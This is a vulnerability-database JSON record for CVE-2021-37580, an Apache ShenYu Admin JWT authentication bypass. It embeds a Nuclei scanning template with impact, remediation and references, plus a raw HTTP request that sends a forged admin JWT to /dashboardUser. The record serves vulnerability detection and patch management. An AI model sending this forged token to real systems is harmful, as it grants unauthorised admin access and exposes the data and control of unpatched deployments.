{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2021-37580/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2021-37580/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2021-37580/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2021-37580/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2021-37580/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2021-37580"},"sightings":{"href":"/api/v1/sightings/cve-2021-37580"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2021/CVE-2021-37580.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2021-37580\n\ninfo:\n  name: Apache ShenYu Admin JWT - Authentication Bypass\n  author: pdteam\n  severity: critical\n  description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.\n  impact: |\n    This vulnerability can lead to unauthorized access to sensitive information, modification of data, and potential compromise of the entire Apache ShenYu system.\n  remediation: |\n    Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-37580\n    - https://github.com/fengwenhua/CVE-2021-37580\n    - https://lists.apache.org/thread/o15j25qwtpcw62k48xw1tnv48skh3zgb\n    - http://www.openwall.com/lists/oss-security/2021/11/16/1\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-37580\n    cwe-id: CWE-287\n    epss-score: 0.41851\n    epss-percentile: 0.98641\n    cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: apache\n    product: shenyu\n  tags: cve2021,cve,apache,jwt,shenyu,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /dashboardUser HTTP/1.1\n        Host: {{Hostname}}\n        X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        words:\n          - 'query success'\n          - '\"userName\":\"admin\"'\n          - '\"code\":200'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220685917a9408028a9b7a471f9099819a6f8414e36daa2ace60f320b2afae1c9a6022100bb1467aecd18ec9f7d3d476f5f3ff05cc6b4e9ad1ddc7bda113b262efc6252cc:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2021-37580"}